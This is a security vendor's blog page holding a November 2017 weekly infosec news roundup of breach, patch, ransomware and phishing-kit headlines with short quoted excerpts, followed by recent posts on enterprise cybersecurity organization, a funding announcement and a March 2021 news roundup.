Weekly InfoSec Roundup 11/03/17
November 3, 2017 by Syed Abdur

This week’s InfoSec news highlighted the importance of risk management in an ever changing and fast paced cyber security environment. Hilton found themselves in trouble over a data breach that cost them $700,000. Read on for more news and information on risk from this week.


  • How to focus C-Suite Attention on the Issue of Cybersecurity
  • “With large-scale cyber attacks becoming increasingly common, having an effective defence strategy in place has never been more important. A big challenge, however, is ensuring senior management fully understands the issue.”
    Read More

  • Oracle Fixes “Default Account” Issue Rated 10 Out of 10 on Severity Scale
  • “Oracle has released patches for a security issue affecting the Oracle Identity Manager that has received a rare 10 out of 10 score on the CVSSv3 bug severity scale. The giant software maker has remained tight-lipped about the issue and has not released any type of meaningful explanation in an attempt to delay the start of attacks trying to exploit this flaw as long as possible, giving customers more time to patch.”
    Read More

  • Hilton agrees to $700,000 settlement over data breaches
  • “On Tuesday, Attorney General Eric Schneiderman said that the Hilton Domestic Operating Company, formerly known as Hilton Worldwide, will pay $700,000 in recompense for failing in its duty — not simply by having poor security in the first place which allowed the data breaches to occur, but for then leaving customers in the dark.”
    Read More

  • Measuring cyber resilience – a rising tide raises all ships
  • “I admit it … I am one of the 143,000,000 people afflicted by the Equifax breach. For those of us who reside in the U.S., that number approaches 60% of all adults, based on recent numbers from the U.S. Census Bureau. Perhaps most unsettling is that failing to perform something as routine as a timely patch produced an event so catastrophic that it cost the CISO, CIO and CEO their jobs.”
    Read More

  • WannaCry, Cerber most used ransomware types, hospitals most hit sector, report
  • “WannaCry and Cerber has totally dominated the ransomware landscape so far this year comprising almost all the attacks that have taken place, while other big names such as Locky were barely a blip on the radar.”
    Read More

  • Cisco patches 16 vulnerabilities to kick off November
  • “Cisco Systems on Wednesday issued patches and corresponding security alerts for 16 different product vulnerabilities, half of which are considered high impact in nature.”
    Read More

  • Another misconfigured Amazon S3 server leaks data of 50,000 Australian employees
  • “Another misconfigured Amazon server has resulted in the exposure of personal data – this time on 50,000 Australian employees that were left unsecure by a third-party contractor.”
    Read More

  • Just one day after its release, iOS 11.1 hacked by security researchers
  • “News of the exploits came from Trend Micro’s Mobile Pwn2Own contest in Tokyo, where security researchers found two vulnerabilities in Safari, the mobile operating system’s browser.””
    Read More

  • Silence Please: New Carbanak-Like Group Attacks Banks
  • “Researchers have uncovered a new advanced threat group which has targeted at least 10 financial institutions globally using tools and techniques similar to the notorious Carbanak group.”
    Read More

  • Cisco Patches Serious DoS, Injection Flaws in Several Products
  • “Cisco Systems on Wednesday issued patches and corresponding security alerts for 16 different product vulnerabilities, half of which are considered high impact in nature.”
    Read More

  • Analysis of 3,200 Phishing Kits Sheds Light on Attacker Tools and Techniques
  • “Phishing kits are used extensively by cybercriminals to increase the efficiency of stealing user credentials. The basic kit comprises an accurate clone of the target medium’s login-in page (Gmail, Facebook, Office 365, targeted banks, etc), and a pre-written php script to steal the credentials — both bundled and distributed as a zip file. Successfully phished credentials are mailed by the script to the phisher, or gathered in a text file for later collection. This is commodity phishing; not spear-phishing.”
    Read More

  • Shadow IT Growth Introducing Huge Compliance Risks: Report
  • “Shadow IT continues to grow, while senior management remains in denial. The average enterprise now uses 1,232 cloud apps (up 33% from the second half of last year), while CIOs still believe their organizations use between just 30 and 40 cloud apps and services. Within this cloud, 20% of all stored data is at risk from being ‘broadly shared’.”
    Read More

  • Hacker holds university for ransom threatens to dump student info
  • “A hacker is trying to extort a Canadian university, threatening to dump student information unless university top brass pay 30,000 CAD (23,000 USD).”
    Read More

  • Cybersecurity Pros Can’t Keep Pace with Threat Landscape
  • “Most (54%) cybersecurity professionals believe the threat landscape is evolving faster than they can respond, with a lack of preparation and strategic thinking endemic, according to RedSeal.”
    Read More

  • Brinqa @ Cyber Security Summit Boston
  • Brinqa is a platinum sponsor at the upcoming Cyber Security Summit Boston on November 8, 2017. We will be available at booth #27, #28 for product demos and discussions around cyber risk management. Syed Abdur, Director of Product Management, will be hosting a session on “Building a Comprehensive Cyber Risk Program through Effective Vulnerability Management”. If you’re a C-Level exec in the Boston area, contact us at info@brinqa.wpengine.com for complimentary access to the event.

Recent Posts
June 24, 2021
What is the Role of Cybersecurity in your Enterprise?

What does cybersecurity mean to your business? This might seem like an odd question, but how an enterprise responds to it can say a lot about the culture and practice of cybersecurity within that organization. There are many different ways to ask the same question — Which function does cybersecurity report to within the enterprise? Who are the internal clients of cybersecurity? Does cybersecurity leadership have a voice at the highest levels of corporate decision-making? There are 2 main schools of thought about the role and orientation of cybersecurity within the enterprise. The traditional school places cybersecurity within the Information Technology (IT) function of a business. In this model cybersecurity reports to IT, IT is the internal client for cybersecurity, and the CISO might report up to the CTO or CIO. It’s easy to see why one might make this association. IT and cybersecurity professionals often have similar or adjacent skillsets and overlapping educational and professional backgrounds. Both functions often deal with highly technical, specialized, and complex information and processes. However, the goals and KPIs of IT and cybersecurity are not only unaligned, they are often in direct conflict. The internal clients for IT are other business functions that essentially pay for the various technology assets (applications, servers, cloud instances, etc.) required to keep the enterprise running. IT performance is evaluated by how seamlessly, continuously, and cheaply they are able to deliver their services. IT doesn’t really have visibility into or an understanding of how these assets are being used by the business, what kind of data they process, which critical business functions they support. When cybersecurity comes to IT and tells them that a particular technology asset or part of the IT infrastructure has problems or weaknesses that could be exploited by malicious actors, they have to weigh the benefits — stopping a potential attack that may or may not happen vs. the costs — resources allocated to fix the problem, unhappy internal clients due to technology assets being unavailable during fixing, valuable time spent fixing and validating the issue. This is a hard sell and essentially amounts to self-regulation. A significant percentage of breaches exploit known vulnerabilities and weaknesses within an organization. Looked at from this lens, it's not difficult to see how such problems can go unaddressed. The modern school of thought recognizes Cybersecurity as its own independent vertical within the enterprise — like sales, marketing, HR, or any other function whose purpose is to help the business function and thrive. In this model, cybersecurity has various different business functions as internal clients, and the CISO might have a seat at the C-level table. Cybersecurity informs business stakeholders of the risks they face as a result of the technology infrastructure they utilize. The business stakeholders provide the context necessary for informed risk triage and collaborate with cybersecurity to identify which vulnerabilities or weaknesses pose the biggest threats to the part of business they own. These prioritized risks are then sent to IT for remediation. Cybersecurity provides guidance to IT on how they may remediate or mitigate a particular problem. Since risk remediation or mitigation is being driven by the business stakeholders, IT is incentivized to fix these problems. Risk-based cybersecurity is a methodology for program design that can help organizations put this modern approach into practice. By putting an emphasis on incorporating business context in the risk analysis process and data models, and by ensuring that business stakeholders are involved in the decision chain, risk-based cybersecurity programs provide a shared space where IT, business, and cybersecurity can come together and collaborate.

June 8, 2021
Brinqa Growth and Future

I'm proud and excited to announce that Brinqa has raised $110 Million in growth capital from leading global venture capital and private equity firm Insight Partners. This is our first institutional investment and represents a significant milestone for the company. Brinqa was bootstrapped and remained founder-backed as we shaped the Cyber Risk Management space, achieved strong organic growth and profitability, and acquired some of the biggest brand names in the world as customers. This new injection of funds combined with Insight Partners' ScaleUp expertise will fuel the next stage of our growth and accelerate ongoing efforts to make Brinqa an essential, unifying component of every enterprise cybersecurity ecosystem. Our mission, values, and objectives as a company remain the same; this partnership will help us achieve them faster and better. We decided to take this step with Insight Partners because of how aligned they are with our vision for Brinqa and the priority of long-term and short-term goals. We firmly believe that Brinqa is an essential platform for all enterprise cybersecurity organizations. As digital transformation proliferates across industries and saturates every aspect of business, the IT infrastructure to enable and the security ecosystem to protect become larger and more complex. Imagine a scenario where hundreds of different teams, systems, and programs — each focused on a task so demanding and technical that it requires specialized skills and tools — work towards the same overarching goal but rarely communicate with each other. Unfortunately, this is often the reality for most cybersecurity organizations. To be effective and a true contributor to business success, it must function as ONE TEAM aligned in purpose, connected in data, and transparent in communication. This is the vision that Brinqa helps our customers achieve. We know that this is possible because we have proven it at some of the world's largest and most complex enterprise IT environments. We are fortunate to count among our customers three out of the five largest retail companies in the world, the largest healthcare providers in the US, and the most prominent global brands in technology, financial services, insurance, healthcare, manufacturing, aviation, and critical infrastructure. This partnership will help us bring this vision to cybersecurity practitioners and organizations everywhere. The capital infusion will be used to accelerate sales and marketing initiatives, enhance customer experience and community building, and strengthen partner and channel ecosystems. I am so thankful to the Brinqa family — our employees, customers, and partners. You are the source of the immeasurable hard work, innovation, creativity, and conviction it has taken to reach this huge milestone, and all credit for this accomplishment goes to you. I am excited as we embark on this next stage of our journey and look forward to achieving greater heights together.

March 31, 2021
March InfoSec Roundup

Microsoft Exchange Zero-Day Attackers Spy on U.S. Targets Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Read More Critical Microsoft Defender Bug Actively Exploited; Patch Tuesday Offers 83 Fixes The first Patch Tuesday security bulletin for 2021 from Microsoft includes fixes for one bug under active attack, possibly linked to the massive SolarWinds hacks. Microsoft addressed 10 critical bugs, one under active exploit and another publicly known, in its January Patch Tuesday roundup of fixes. In total it patched 83 vulnerabilities. Read More Critical Cisco SD-WAN Bugs Allow RCE Attacks Cisco is warning of multiple, critical vulnerabilities in its software-defined networking for wide-area networks (SD-WAN) solutions for business users. Read More SonicWall Breach Stems from ‘Probable’ Zero-Days   SonicWall is investigating 'probable' zero-day flaws in its remote access security products that have been targeted by 'highly-sophisticated' attackers. The company says it is investigating the attack and will update customers within 24 hours. Read More Cisco DNA Center Bug Opens Enterprises to Remote Attack   A cross-site request forgery (CSRF) vulnerability in the Cisco Digital Network Architecture (DNA) Center could open enterprise users to remote attack and takeover. The high-severity security vulnerability (CVE-2021-1257) allows cross-site request forgery (CSRF) attacks. Read More Industrial Gear at Risk from Fuji Code-Execution Bugs Industrial control software (ICS) from Fuji Electric is vulnerable to several high-severity arbitrary code-execution security bugs, according to a federal warning. Authorities are warning the flaws could allow physical attacks on factory and critical-infrastructure equipment. Read More